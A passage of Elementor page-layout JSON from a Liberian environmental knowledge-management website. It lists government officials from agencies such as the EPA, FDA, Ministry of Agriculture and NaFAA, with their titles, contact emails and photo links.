"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br 